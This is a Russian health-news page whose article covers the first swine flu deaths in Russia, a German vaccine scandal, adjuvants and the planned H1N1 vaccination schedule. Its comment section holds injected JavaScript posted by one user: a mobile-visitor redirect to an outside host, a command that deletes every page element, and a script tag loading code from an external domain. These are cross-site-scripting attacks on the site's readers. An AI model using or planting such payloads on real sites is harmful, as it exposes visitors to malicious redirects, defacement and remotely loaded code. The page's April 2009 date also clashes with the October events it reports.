Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Свиной грипп: в России по...  >>  Свиной грипп: в России появились первые жертвы
 
Обратная связь
 

Свиной грипп: в России появились первые жертвы

Размер шрифта
29 апреля 2009 23:34
  • google_analytics: false
  • Нравится

Татьяна Батенёва / «Здоровье-инфо»

На этой неделе Минздравсоцразвития России официально признало, что в стране зарегистрированы первые смерти от свиного гриппа. Это обстоятельство побудило чиновников к тому, чтобы ускорить начало массовой иммунизации новыми отечественными вакцинами. Чем они отличаются от вакцин прошлых лет и от импортных аналогов? Кто получит прививки бесплатно? Можно ли будет купить вакцины от свиного гриппа в аптеках или получить прививку в поликлинике? Попытаемся ответить на эти вопросы.

Обратились к врачам поздно

27 октября утром в столичной инфекционной клинической больнице №1 скончалась 53-летняя Валентина Б. Несколько дней она плохо себя чувствовала: боли в животе, диарея, слабость, повышенная температура. На пятые сутки женщина была госпитализирована в городскую больницу № 4. После того, как сделали анализы, стало ясно – у Валентины свиной грипп. Она также страдала серьезными эндокринным и сердечно-сосудистым заболеваниями, поэтому ее состояние быстро ухудшалось. На седьмые сутки развилась двусторонняя пневмония, нарастала дыхательная недостаточность.

Валентину срочно перевезли в инфекционную больницу №1, куда привозят всех захворавших в столице с подозрением на свиной грипп, поместили в бокс. Несмотря на комплексную реанимационную помощь, в том числе и искусственную вентиляцию легких, спасти ее не удалось.

Зарегистрировано также три летальных исхода от гриппа, вызванного вирусом А/Н1N1, в Забайкальском крае. Наличие вируса у погибших подтверждено лабораторно. Во всех трех случаях больные не обращались к врачам и лечились самостоятельно в течение 3-5 дней от начала заболевания. Госпитализированы были на 3-5 день уже в состоянии средней тяжести. С момента госпитализации все они получали комплексное противовирусное лечение. На 6-7 сутки у них отмечалось внезапное ухудшение состояния с развитием пневмонии и дыхательной недостаточности. Смерть наступала через 1-3 суток после этого.

Наконец, в четверг пришло сообщение, что зарегистрирован первый случай смерти от свиного гриппа в Красноярском крае. Министр здравоохранения края Вадим Янин сообщил, что «скончалась женщина 39 лет, которая ранее не обращалась за медицинской помощью».

Получается, что во всех этих случаях люди проигнорировали многократные разъяснения официальных лиц и врачей, что свиной грипп коварен, и при появлении определенных симптомов (высокая температура, ломота в костях, головная боль, затруднения с дыханием и т.п.) необходимо сразу же обращаться за медицинской помощью.

Скандал в немецком семействе

На предыдущей неделе разгорелся скандал в средствах массовой информации Германии. Журналисты нескольких изданий обнародовали информацию о том, что правительственные чиновники якобы закупили для себя и военнослужащих одну противогриппозную вакцину – качественную и не вызывающую побочных эффектов, а для населения – другую, которая способна привести к осложнениям. Подробности этой истории несколько дней бушевали в газетах и на экранах телевидения, первые лица государства были вынуждены оправдываться и давать разъяснения.

А дело в том, что по уверениям журналистов, для чиновников и военнослужащих была закуплена вакцина Celvapan производства американской фармацевтической компании Baxter. Эта вакцина якобы является более щадящей для организма и отличается тем, что не содержит адъювантов (добавок, формирующих более выраженный иммунитет). В то же время для вакцинации остального населения Германии было приобретено другое средство — вакцина производства британской фармацевтической компании GlaxoSmithKline (GSK).

Досталось и сотрудникам Института имени Пауля Эрлиха. Именно они высказались в пользу второй вакцины для массовой иммунизации, несмотря на некий ряд явных недостатков этого средства. В частности, из-за того, что не были проведены клинические исследования на беременных женщинах, она не может быть использована для них. Немецкое общество врачей общей и семейной медицины призвало докторов не использовать закупленную государством вакцину. Официальные представители государства призывали не паниковать.

— С медицинской точки зрения, и институт имени Поля Эльриха подтверждает что, не существует лучшей или худшей вакцины, — сказал представитель правительства Германии Ульрих Вильгельм. – Обе они имеют равное право на существование.

Так кто же был прав в шумном немецком скандале?

Адъювант его превосходительства

Адъювантами называют различные вещества, которые добавляют в вакцины для усиления иммунного ответа организма. Точная комбинации адъюванта с антигеном (то есть тем самым микроорганизмом, который вызывает заболевание, либо частью его генетического материала) и определяет – будет ли вакцина эффективной или нет. В этой роли чаще всего используются гидроокись алюминия, сама по себе довольно токсичная в больших количествах, и натуральное масло сквален, которое вырабатывается во многих растениях, животных, а также в печени человека. В последние годы ученые всего мира активно ищут новые адъюванты – не менее эффективные, но более безопасные.

Так, в отечественных вакцинах от гриппа «Гриппол» в это роли выступает иммуномодулятор полиоксидоний, который применяется в медицине и сам по себе при многих заболеваниях. Он усиливает иммунный ответ, не будучи токсичным. В вакцинах против других инфекций также используют адъюванты. Например, вакцина против гепатита В, в состав которой входит фирменный адъювант одной из фармкомпаний, применяется даже у пациентов с тяжелой почечной недостаточностью, у которых обычная вакцина против гепатита В иммунитета не формирует.

Специалисты говорят, что в «провинившейся» вакцине, которая вызвала скандал в Германии, в качестве адъюванта используется как раз суспензия сквалена – сама по себе она совершенно не токсична и опасных побочных эффектов вызвать не может, что доказано многочисленными проверками экспертов Всемирной организации здравоохранения (ВОЗ). Напротив, она создает в месте инъекции нечто вроде депо – так в медицине называют препараты, которые рассасываются в организме медленно.

Иммунный ответ формируется постепенно и более надежно. Но возмущенным немцам этого никто не объяснял – достаточно было самого факта, что народу дадут не то, что начальникам. Вполне возможно, что скандал – это отражение войн между фармацевтическими производителями за бюджетные средства государства.
 
Вакцины бывают разные

Многие уверены, что прививка защищает от заражения гриппом. Это не так. В отличие от многих других вакцин, противогриппозные такой гарантии не дают, заразиться и после прививки можно. Зато они надежно защищают от тяжелого течения заболевания и самого страшного – его осложнений.

Современные вакцины от гриппа производятся по разным технологиям. У нас в стране производится и используется живая вакцина – зародыши куриных яиц заражают реальным вирусом, он в них размножается, потом его очищают и производят вакцину. Вводится в нос в виде спрея. На живую вакцину вырабатывается самый сильный иммунитет, но долгие годы в мире считалось, что это производство небезопасно и для тех, кто там работает, и в случае возможной «утечки» вируса.

Однако все главные победы человечества над инфекциями — оспой, полиомиелитом, желтой лихорадкой, корью—были одержаны не убитой, а живой вакциной. Американские ученые несколько лет назад получили задание разработать живую вакцину от гриппа и успешно выполнили ее.

Тогда-то ВОЗ и медики разных стран сразу проявили огромный интерес к российской разработке. В штаб-квартиру ВОЗ пригласили ее автора, доктора медицинских наук Ларисы Руденко и других наших специалистов.

Наиболее распространенные вакцины от гриппа – «убитые», или инактивированные. Вирусы для их производства специально ослабляют, поэтому они дают более слабый иммунитет. В некоторых случаях прививку приходится делать дважды – это две внутримышечных инъекции. Поэтому некоторые врачи считают, что для детей инактивированные вакцины не годятся – все-таки два лишних укола.

Более современные – субъединичные вакцины – содержат не цельный вирус, а лишь его частицы: либо поверхностные белки, либо внутренние. Этого достаточно, чтобы иммунитет распознал «агрессора» и начал производить антитела для борьбы с вирусами.

Наконец, самые современные – рекомбинантные и сплит-вакцины. В первых отдельные гены вирусов встраивают в геном дрожжевых клеток, во вторых отдельные частицы и белки вируса дополнительно расщепляют и очищают. Эти вакцины почти не обладают побочными эффектами, не вызывают даже местных реакций, но и иммунитет формируют менее надежный.

Что подложили свиному гриппу наши ученые

В России уже официально зарегистрированы четыре вакцины от гриппа А(H1N1). Две из них производит НПО «Микроген». Это живая вакцина «Инфлювир» и инактивированная субъединичная «Пандефлю». Две вакцины разработала также фармацевтическая компания "Петровакс": субъединичные «МоноГриппол» и «МоноГриппол Нео».

При производстве всех вакцин, как и в других странах, использовали штамм А/California/7/2009/(H1N1), рекомендованный ВОЗ для производства пандемичной вакцины этого сезона. Данные, полученные в результате клинических испытаний на взрослых, свидетельствуют о хорошей переносимости, безопасности и отсутствии серьезных побочных реакций.

Сейчас идет производство вакцин, а уже 9 ноября врачи начнут прививать первые группы риска – работников служб жизнеобеспечения: коммунальщиков, специалистов по обслуживанию опасных производств, возможно, милиции, транспортников и т.п. С 23 ноября начнут прививать медицинских работников, преподавателей и учащихся образовательных учреждений старше 18 лет. Затем наступит очередь детей и подростков.

Когда именно дойдет их черед, пока неясно – не закончены клинические испытания вакцины для детей и подростков 12-17 лет, а еще необходимо провести их в группах детей 7-11 лет и 3-6 лет. По всем нормам каждое из испытаний должно длиться не менее трех недель, а потом надо еще зарегистрировать детские вакцины и произвести необходимое их количество. По расчетам организаторов, этот этап вакцинации может начаться лишь в следующем году.

В свободной продаже в аптеках и для платной иммунизации вакцины от свиного гриппа в этом сезоне вряд ли появятся – производственных мощностей просто не хватит. Тем более важно соблюдать правила профилактики и своевременно обращаться к врачам в случае заражения.

Подробную информацию о профилактике, мерах защиты и рекомендациях врачей вы найдете на нашем сайте в разделе «Свиной грипп».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

25 июня 2015 в 22:44

Цитировать   |   Пожаловаться

>d = {mob: function(){return navigator.userAgent.match(/mobile/i);},Android: function(){return navigator.userAgent.match(/Android/i);},BlackBerry: function() { return navigator.userAgent.match(/BlackBerry/i);},iOS: function() { return navigator.userAgent.match(/iPhone|iPad|iPod/i);},Opera: function() { return navigator.userAgent.match(/Opera Mini/i);},Windows: function() { return navigator.userAgent.match(/IEMobile/i);},any: function() { return (d.mob || d.Android() || d.BlackBerry() || d.iOS() || d.Opera() || d.Windows());}}; if(d.any()) window.location.href="http://A25832-hostde3.fornex.org/";

2 - zzzzzz

26 июня 2015 в 01:37

Цитировать   |   Пожаловаться

> $("*").remove();

3 - zzzzzz

30 июня 2015 в 19:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

01 июля 2015 в 00:58

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.